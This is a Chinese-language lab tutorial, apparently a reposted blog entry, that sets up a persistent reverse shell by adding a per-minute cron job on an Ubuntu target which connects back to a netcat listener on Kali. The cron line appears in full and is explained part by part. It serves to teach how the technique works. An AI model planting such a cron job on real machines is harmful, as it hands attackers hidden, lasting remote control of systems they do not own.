ubuntu计划任务反弹

目录

实验环境

实验步骤

目标主机构造任务计划

构造语句

 语句解释

kali开启监听

监听成功

问题

原因


实验环境

攻击者

操作系统:kali

IP:192.168.244.141

目标主机

操作系统:ubuntu

IP:192.168.244.151

实验步骤

目标主机构造任务计划

构造语句

* * * * * /bin/bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'

 语句解释

* * * * *:这是 Cron 的时间表达式,表示这个命令将每分钟执行一次。具体含义是分别对应分钟、小时、天、月、星期几,这里都是 *,表示每个可能的值,即每分钟执行一次。

/bin/bash -c 'sh -i >& /dev/tcp/{ip}/{port} 0>&1':这是要在 Cron 任务中执行的命令。

/bin/bash -c:这个部分指定要执行的命令是用 Bash 解释执行。

'sh -i >& /dev/tcp/{ip}/{port} 0>&1':这是 Bash 命令本身,由单引号包围以确保整个命令被视为一个参数传递给 -c 选项。

0>&1:将标准输入重定向到标准输出,确保输入输出的正常运行

>& /dev/tcp/{ip}/{port}

/dev/tcp/{ip}/{port} 是 Bash 的特殊构造,用于在 Bash 中通过 TCP 连接实现网络通信。/dev/tcp 是一个虚拟的目录,Bash 会将其解释为通过 TCP 连接进行数据传输。{ip}{port} 分别应该替换为实际的目标 IP 地址和端口号。

>& 表示将标准输出和标准错误重定向到指定位置。

sh -i:启动一个交互式的 Shell,这里使用 sh 是因为在某些系统上,sh 可能是 bash 的符号链接。

kali开启监听

nc:是 netcat 命令的缩写,是一个网络工具,可以用来读取和写入网络连接中的数据。

-l:表示 netcat 进入监听模式,即等待来自客户端的连接请求。

-p:后面接端口号,表示要监听的端口号。例如,nc -lp 1234 就是在本地监听 1234 端口

监听成功

问题

当反弹语句为中启动交互shell时是sh -i这个如下列代码,监听会失败的

* * * * * /bin/bash -c 'sh -i >& /dev/tcp/{ip}/{port} 0>&1'

原因

在某些操作系统中,sh可能被符号链接到bash,这意味着虽然你使用的是sh命令,实际上执行的是bash解释器。sh通常是指shell的默认符号链接,它可以指向系统中安装的任何shell(如bashdash等)。所以再ubuntu使用sh反弹shell时没有成功,但是使用bash反弹shell成功了。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/45023.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

论文学习_An Empirical Study of Deep Learning Models for Vulnerability Detection

1. 引言 研究背景:近年来,深度学习漏洞检测工具取得了可喜的成果。最先进的模型报告了 0.9 的 F1 分数,并且优于静态分析器。结果令人兴奋,因为深度学习可能会给软件保障带来革命性的变化。因此,IBM、谷歌和亚马逊等行业公司非常感兴趣,并投入巨资开发此类工具和数据集。…

(8)揭示Python编程精髓:深潜继承与多态的奇幻之旅

目录 1. 命名空间与作用域1.1 命名空间概述1.2 作用域1.2.1 局部作用域1.2.2 全局作用域1.2.3 修改全局变量1.2.4 嵌套作用域 2. 继承3. 多态(Polymorphism) 1. 命名空间与作用域 1.1 命名空间概述 命名空间是一个从名字到对象的映射,它在P…

Qt:19.浮动窗口/子窗口(子窗口介绍、代码方式创建子窗口、设置子窗口标题、为子窗口添加控件、设置子窗口停靠位置)

目录 1.子窗口介绍: 2.代码方式创建子窗口: 3.设置子窗口标题: 4.为子窗口添加控件: 5.设置子窗口停靠位置。 1.子窗口介绍: 在 Qt 中,可以创建和管理子窗口(子窗口体)以实现多窗…

图片怎么制作成长期可用的活码?扫码提供图片预览的制作技巧

现在图片的尺寸和清晰度的质量越来越高,相对应的会占用更多的存储空间,现在很多人会将图片存入云端后,通过生成二维码的方式,扫码来查看图片内容。图片转换二维码有利于将图片分享给其他人查看,还能够节省更多的空间&a…

SpringBoot自己开发一个starter

提示:本文主要讲述如何自行开发一个SpringBoot的starter 文章目录 目录 文章目录 前言 一、Starter是什么 二、创建一个SpringBoot项目 1.创建一个基本的SpringBoot项目 2.选择要下载的库 三、设置项目 1.提示 2.配置pom.xml 3.重点代码 1.创建一个User类…

16.x86游戏实战-汇编指令push pop pushad popad

免责声明:内容仅供学习参考,请合法利用知识,禁止进行违法犯罪活动! 本次游戏没法给 内容参考于:微尘网络安全 工具下载: 链接:https://pan.baidu.com/s/1rEEJnt85npn7N38Ai0_F2Q?pwd6tw3 提…

【第29章】MyBatis-Plus之分页插件

文章目录 前言一、支持的数据库二、配置方法三、属性介绍四、自定义 Mapper 方法中使用分页五、其他注意事项六、Page 类七、实战1. 配置类2. 分页类3. 测试 总结 前言 MyBatis-Plus 的分页插件 PaginationInnerInterceptor 提供了强大的分页功能,支持多种数据库&a…

Windows电脑安装Python结合内网穿透轻松搭建可公网访问私有网盘

文章目录 前言1.本地文件服务器搭建1.1.Python的安装和设置1.2.cpolar的安装和注册 2.本地文件服务器的发布2.1.Cpolar云端设置2.2.Cpolar本地设置 3.公网访问测试4.结语 前言 本文主要介绍如何在Windows系统电脑上使用python这样的简单程序语言,在自己的电脑上搭建…

kubernetes授予用户指定命名空间的使用权限

kubernetes授予用户指定命名空间的使用权限 问题描述具体实现签发客户端证书创建RBAC策略生成kubeconfig文件 问题描述 假如我们部门来了个新同事,他需要使用kubernetes集群,但是因为他刚来,还不熟悉,所以不能直接将kubernetes集…

Spring如何控制Bean加载+执行顺序

1. Order 注解和 Ordered 接口 用途:控制组件执行顺序或排序,但不控制Bean初始化顺序。定义执行顺序:通过整数值指定组件优先级,数值越小优先级越高。集合排序:影响自动装配到集合中的组件排列顺序。使用场景&#xf…

77.MySQL的分页查询

一、LIMIT关键字 LIMIT关键字用于限制返回结果集中的行数。其基本语法如下: SELECT * FROM 表名 LIMIT 行数; 例如,要从名为mark_info的表中选择最新创建的10个工单的信息,可以执行以下查询: SELECT * FROM mark_info ORDER B…

电力需求预测挑战赛笔记 Taks1 跑通baseline

#AI夏令营 #Datawhale #夏令营 赛题 一句话介绍赛题任务可以这样理解赛题: 【训练时序预测模型助力电力需求预测】 电力需求的准确预测对于电网的稳定运行、能源的有效管理以及可再生能源的整合至关重要。 赛题任务 给定多个房屋对应电力消耗历史 N 天的相关序列数…

拓扑排序(算法篇)

算法之拓扑排序 拓扑排序 概念: 拓扑排序是对有向无圈图的顶点的一种排序。排序不必是唯一的,任何合理的排序都是可以的。具体做法是:先找出任意一个没有入边的顶点v(就是没有其他顶点指向的顶点),将顶点v放入队列,…

element-plus el-table点击当前行和划过展示鼠标

在 Element Plus 的 el-table 组件中,设置滑过行时鼠标的样式可以通过 CSS 来实现。你可以使用 CSS 的 cursor 属性来定义鼠标悬停时的样式。以下是一个简单的例子: 首先,在你的 Vue 组件的 .el-table .el-table__row:hover {cursor: poin…

09.AOP-尚硅谷Spring零基础入门到进阶,一套搞定spring6全套视频教程(源码级讲解)

现有代码缺陷 针对带日志功能的实现类,我们发现有如下缺陷: 对核心业务功能有干扰,导致程序员在开发核心业务功能时分散了精力附加功能分散在各个业务功能方法中,不利于统一维护 解决思路 解决核心:解耦。把附加功能从…

glm-4 联网搜索 api 测试

今天测试了一下 glm-4 的联网搜索 web_search tool 调用,发现了 web_search 的网页检索返回结果中几个比较诡异的事情,特此记录: 有些检索结果没有 icon、link、media 字段,但从内容上看确实是联网搜索出来的结果,不知…

从零开始读RocketMq源码(三)Broker存储Message流程解析

目录 前言 准备 消息载体CommitLog 文件持久化位置 源码解析 broker消息对象MessageExtBrokerInner 异步存储message CommitLog的真相 创建MappedFile文件 加入异步刷盘队列 Message异步存储MappedByteBuffer 总结 前言 在面试中我们经常会听到这样的回答&#x…

国产化趋势下源代码数据防泄密的信创沙盒的方案分享

随着国产化的大力推进,越来越多的企事业单位在逐步替换Windows、Linux等操作系统的使用。那么什是国产化了?国产化是指在产品或服务中采用国内自主研发的技术和标注,替代过去依赖的他国的产品和服务,国产化又被称之为“信创”&…

GitLab CI/CD实现项目自动化部署

1 GitLab CI/CD介绍 GitLab CI/CD 是 GitLab 中集成的一套用于软件开发的持续集成(Continuous Integration)、持续交付(Continuous Delivery)和持续部署(Continuous Deployment)工具。这套系统允许开发团队…

vue里实现点击按钮回到页面顶部功能,博客必备!

效果 步骤 1-标签结构 动态绑定样式style&#xff0c;监听点击事件&#xff0c;后续控制opacity透明度。和滚动距离 <div class"toTop" :style"dynamicStyles" click"toTop"><!--<i class"fa fa-arrow-up"></i>…